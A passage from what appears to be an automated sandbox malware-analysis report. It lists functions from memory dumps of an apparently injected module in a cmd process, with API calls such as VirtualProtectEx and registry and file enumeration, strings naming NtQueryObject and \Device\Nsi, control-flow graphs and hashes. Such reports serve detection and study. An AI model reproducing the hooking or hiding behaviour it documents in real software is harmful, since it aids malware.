                                            • GetModuleFileNameW.KERNEL32 ref: 00000253FC403A35
                                            • PathFindFileNameW.SHLWAPI ref: 00000253FC403A44
                                              • Part of subcall function 00000253FC403F88: StrCmpNIW.SHLWAPI(?,?,?,00000253FC40272F), ref: 00000253FC403FA0
                                              • Part of subcall function 00000253FC403EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000253FC403A5B), ref: 00000253FC403EDB
                                              • Part of subcall function 00000253FC403EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000253FC403A5B), ref: 00000253FC403F0E
                                              • Part of subcall function 00000253FC403EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000253FC403A5B), ref: 00000253FC403F2E
                                              • Part of subcall function 00000253FC403EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000253FC403A5B), ref: 00000253FC403F47
                                              • Part of subcall function 00000253FC403EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000253FC403A5B), ref: 00000253FC403F68
                                            • CreateThread.KERNELBASE ref: 00000253FC403A8B
                                              • Part of subcall function 00000253FC401E74: GetCurrentThread.KERNEL32 ref: 00000253FC401E7F
                                              • Part of subcall function 00000253FC401E74: CreateThread.KERNELBASE ref: 00000253FC402043
                                              • Part of subcall function 00000253FC401E74: TlsAlloc.KERNEL32 ref: 00000253FC402049
                                              • Part of subcall function 00000253FC401E74: TlsAlloc.KERNEL32 ref: 00000253FC402055
                                              • Part of subcall function 00000253FC401E74: TlsAlloc.KERNEL32 ref: 00000253FC402061
                                              • Part of subcall function 00000253FC401E74: TlsAlloc.KERNEL32 ref: 00000253FC40206D
                                              • Part of subcall function 00000253FC401E74: TlsAlloc.KERNEL32 ref: 00000253FC402079
                                              • Part of subcall function 00000253FC401E74: TlsAlloc.KERNEL32 ref: 00000253FC402085
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                            • String ID:
                                            • API String ID: 2779030803-0
                                            • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction ID: 1ce5ab6cdca28133087365578e00b0f2979cc71bebb00936f5facb8f86157c1c
                                            • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction Fuzzy Hash: E2118035EECE4981FB62D761AD4E3992AA0A7D43D7F502125984681DF0DF3CC7748A08
                                            Function 00000253FC40F598 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: FileHandleType
                                            • String ID:
                                            • API String ID: 3000768030-0
                                            • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction ID: 6076a54b53c7bd1763d0156bef8b29927040315e7ae70683910fd1cc31de5a8a
                                            • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction Fuzzy Hash: 2D31B132ADCF4881EB62CB1599883692650F345BF1F682719DB6A477F0CB34D9B2C308
                                            Function 00000253FC43F598 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: FileHandleType
                                            • String ID:
                                            • API String ID: 3000768030-0
                                            • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction ID: d4b8e497b3c9be9d59337c6abda652c8580fbfb386a3454678d592ce3d51d65e
                                            • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction Fuzzy Hash: 5631A232F58F4891EB61CB1499882692A50F385BF1FA82359DB6A077F0CB35D5B2E344
                                            Function 00000253FC3D2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction ID: cc572ed6fb3ce52298dfa9e0e2379d11894853fc5e67205f38fef5a9beabbd84
                                            • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction Fuzzy Hash: 3A9167B2F4595D87DB90DF65D81876DB3A1F780BD6F0490229E0A07B88DA3CDE12C348
                                            Function 00000253FC401BC4 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00000253FC401724: GetProcessHeap.KERNEL32 ref: 00000253FC40172F
                                              • Part of subcall function 00000253FC401724: HeapAlloc.KERNEL32 ref: 00000253FC40173E
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC4017AE
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC4017DB
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC4017F5
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC401815
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC401830
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC401850
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC40186B
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC40188B
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC4018A6
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC4018C6
                                            • SleepEx.KERNELBASE ref: 00000253FC401BDF
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC4018E1
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC401901
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC40191C
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC40193C
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC401957
                                              • Part of subcall function 00000253FC401724: RegOpenKeyExW.ADVAPI32 ref: 00000253FC401977
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC401992
                                              • Part of subcall function 00000253FC401724: RegCloseKey.ADVAPI32 ref: 00000253FC40199C
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CloseOpen$Heap$AllocProcessSleep
                                            • String ID:
                                            • API String ID: 948135145-0
                                            • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction ID: da9c226a4c26d9eb97cb51e5844c6d5d2d2e3176618dd107d9989a4fec9744ac
                                            • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction Fuzzy Hash: 6B315175ACCE0951FB52DB23DD4D36923A4AB44BD2F0474219E0A97FB6DE34CA708A0C

                                            Non-executed Functions

                                            Function 00000253FC402FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 368 253fc402ff0-253fc403069 370 253fc403384-253fc4033a7 368->370 371 253fc40306f-253fc403075 368->371 371->370 372 253fc40307b-253fc40307e 371->372 372->370 373 253fc403084-253fc403087 372->373 373->370 374 253fc40308d-253fc40309d GetModuleHandleA 373->374 375 253fc40309f-253fc4030af GetProcAddress 374->375 376 253fc4030b1 374->376 377 253fc4030b4-253fc4030d2 375->377 376->377 377->370 379 253fc4030d8-253fc4030f7 StrCmpNIW 377->379 379->370 380 253fc4030fd-253fc403101 379->380 380->370 381 253fc403107-253fc403111 380->381 381->370 382 253fc403117-253fc40311e 381->382 382->370 383 253fc403124-253fc403137 382->383 384 253fc403147 383->384 385 253fc403139-253fc403145 383->385 386 253fc40314a-253fc40314e 384->386 385->386 387 253fc40315e 386->387 388 253fc403150-253fc40315c 386->388 389 253fc403161-253fc40316b 387->389 388->389 390 253fc403251-253fc403255 389->390 391 253fc403171-253fc403174 389->391 392 253fc403376-253fc40337e 390->392 393 253fc40325b-253fc40325e 390->393 394 253fc403186-253fc403190 391->394 395 253fc403176-253fc403183 call 253fc401a30 391->395 392->370 392->383 398 253fc40326f-253fc403279 393->398 399 253fc403260-253fc40326c call 253fc401a30 393->399 396 253fc4031c4-253fc4031ce 394->396 397 253fc403192-253fc40319f 394->397 395->394 402 253fc4031fe-253fc403201 396->402 403 253fc4031d0-253fc4031dd 396->403 397->396 401 253fc4031a1-253fc4031ae 397->401 405 253fc4032a9-253fc4032ac 398->405 406 253fc40327b-253fc403288 398->406 399->398 410 253fc4031b1-253fc4031b7 401->410 413 253fc403203-253fc40320d call 253fc401cc4 402->413 414 253fc40320f-253fc40321c lstrlenW 402->414 403->402 411 253fc4031df-253fc4031ec 403->411 408 253fc4032b9-253fc4032c6 lstrlenW 405->408 409 253fc4032ae-253fc4032b7 call 253fc401cc4 405->409 406->405 415 253fc40328a-253fc403297 406->415 419 253fc4032c8-253fc4032d7 call 253fc401cfc 408->419 420 253fc4032d9-253fc4032e3 call 253fc403f88 408->420 409->408 434 253fc4032ee-253fc4032f9 409->434 417 253fc403247-253fc40324c 410->417 418 253fc4031bd-253fc4031c2 410->418 421 253fc4031ef-253fc4031f5 411->421 413->414 413->417 424 253fc40321e-253fc40322d call 253fc401cfc 414->424 425 253fc40322f-253fc403241 call 253fc403f88 414->425 423 253fc40329a-253fc4032a0 415->423 429 253fc4032e6-253fc4032e8 417->429 418->396 418->410 419->420 419->434 420->429 421->417 432 253fc4031f7-253fc4031fc 421->432 423->434 435 253fc4032a2-253fc4032a7 423->435 424->417 424->425 425->417 425->429 429->392 429->434 432->402 432->421 440 253fc4032fb-253fc4032ff 434->440 441 253fc403370-253fc403374 434->441 435->405 435->423 442 253fc403307-253fc403321 call 253fc413a40 440->442 443 253fc403301-253fc403305 440->443 441->392 445 253fc403324-253fc403327 442->445 443->442 443->445 447 253fc403329-253fc403347 call 253fc413a40 445->447 448 253fc40334a-253fc40334d 445->448 447->448 448->441 450 253fc40334f-253fc40336d call 253fc413a40 448->450 450->441
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: d7a8eae69e3a118943c7a68f742a17d896bd607eadc51ecfcc687599f46614eb
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: 76B1E971AD8E9882EB56CF26DC487996BA4F784BC6F04601ADE0953FA4DF34CE60C744
                                            Function 00000253FC432FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 454 253fc432ff0-253fc433069 456 253fc433384-253fc4333a7 454->456 457 253fc43306f-253fc433075 454->457 457->456 458 253fc43307b-253fc43307e 457->458 458->456 459 253fc433084-253fc433087 458->459 459->456 460 253fc43308d-253fc43309d GetModuleHandleA 459->460 461 253fc4330b1 460->461 462 253fc43309f-253fc4330af GetProcAddress 460->462 463 253fc4330b4-253fc4330d2 461->463 462->463 463->456 465 253fc4330d8-253fc4330f7 StrCmpNIW 463->465 465->456 466 253fc4330fd-253fc433101 465->466 466->456 467 253fc433107-253fc433111 466->467 467->456 468 253fc433117-253fc43311e 467->468 468->456 469 253fc433124-253fc433137 468->469 470 253fc433139-253fc433145 469->470 471 253fc433147 469->471 472 253fc43314a-253fc43314e 470->472 471->472 473 253fc43315e 472->473 474 253fc433150-253fc43315c 472->474 475 253fc433161-253fc43316b 473->475 474->475 476 253fc433251-253fc433255 475->476 477 253fc433171-253fc433174 475->477 480 253fc433376-253fc43337e 476->480 481 253fc43325b-253fc43325e 476->481 478 253fc433186-253fc433190 477->478 479 253fc433176-253fc433183 call 253fc431a30 477->479 485 253fc4331c4-253fc4331ce 478->485 486 253fc433192-253fc43319f 478->486 479->478 480->456 480->469 482 253fc433260-253fc43326c call 253fc431a30 481->482 483 253fc43326f-253fc433279 481->483 482->483 488 253fc4332a9-253fc4332ac 483->488 489 253fc43327b-253fc433288 483->489 492 253fc4331fe-253fc433201 485->492 493 253fc4331d0-253fc4331dd 485->493 486->485 491 253fc4331a1-253fc4331ae 486->491 498 253fc4332b9-253fc4332c6 lstrlenW 488->498 499 253fc4332ae-253fc4332b7 call 253fc431cc4 488->499 489->488 497 253fc43328a-253fc433297 489->497 500 253fc4331b1-253fc4331b7 491->500 495 253fc433203-253fc43320d call 253fc431cc4 492->495 496 253fc43320f-253fc43321c lstrlenW 492->496 493->492 501 253fc4331df-253fc4331ec 493->501 495->496 508 253fc433247-253fc43324c 495->508 505 253fc43321e-253fc43322d call 253fc431cfc 496->505 506 253fc43322f-253fc433241 call 253fc433f88 496->506 504 253fc43329a-253fc4332a0 497->504 510 253fc4332d9-253fc4332e3 call 253fc433f88 498->510 511 253fc4332c8-253fc4332d7 call 253fc431cfc 498->511 499->498 515 253fc4332ee-253fc4332f9 499->515 500->508 509 253fc4331bd-253fc4331c2 500->509 502 253fc4331ef-253fc4331f5 501->502 502->508 512 253fc4331f7-253fc4331fc 502->512 504->515 516 253fc4332a2-253fc4332a7 504->516 505->506 505->508 506->508 520 253fc4332e6-253fc4332e8 506->520 508->520 509->485 509->500 510->520 511->510 511->515 512->492 512->502 523 253fc4332fb-253fc4332ff 515->523 524 253fc433370-253fc433374 515->524 516->488 516->504 520->480 520->515 528 253fc433307-253fc433321 call 253fc443a40 523->528 529 253fc433301-253fc433305 523->529 524->480 530 253fc433324-253fc433327 528->530 529->528 529->530 533 253fc43334a-253fc43334d 530->533 534 253fc433329-253fc433347 call 253fc443a40 530->534 533->524 536 253fc43334f-253fc43336d call 253fc443a40 533->536 534->533 536->524
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: ccbbc6e9edea5e8486e6f80a02a8aae30d180b6a152031c1907c9f2bd62a7343
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: 10B1B371A58E9882EB56CF25C80879963A4F7C0BC6F906026EE0D57F94DF34CE61D748
                                            Function 00000253FC4084B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: 18098eab73ae22247e8997de78074f9d1c62639e070d82cd20275224b332567a
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: 77318172A48F8486EB62CF61EC443DD7360F784789F44502ADA8D47BA4DF78C658C714
                                            Function 00000253FC4384B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: f2d667fddb63464018b1186fc3f2dac64a45d194d1ad2792964a2c7c3122a1aa
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: 83315A72A08F8486EB61CF60E8447ED7360F784799F54502ADA4E47F98EF38C658C714
                                            Function 00000253FC40CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: 3d92adde8fb258e617e55ec2da3fc78e5f0a897a2cddf62eb9678babbca71e80
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: 36418E32A98F8486E761CF25EC443DE73A4F788795F501115EA9D47BA8DF38C265CB04
                                            Function 00000253FC43CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: 6e9a1ca4481f4c7a2e32b4ab4d38883408135ec68585e79261f68911a25fddf3
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: DB418132618F8486EB61CB24E84479E73A4F784795F601226EA9D46F98DF38C265CB04
                                            Function 00000253FC40DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: f680a45d3fb9276a9b9de983c3979be6679c8c974a285e8f13c67f95f6ce25f0
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: 91A13B32FCCE8445FB26DB759C483AD6BA0E741BD5F046115DE9817EB9CA38C265C708
                                            Function 00000253FC43DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
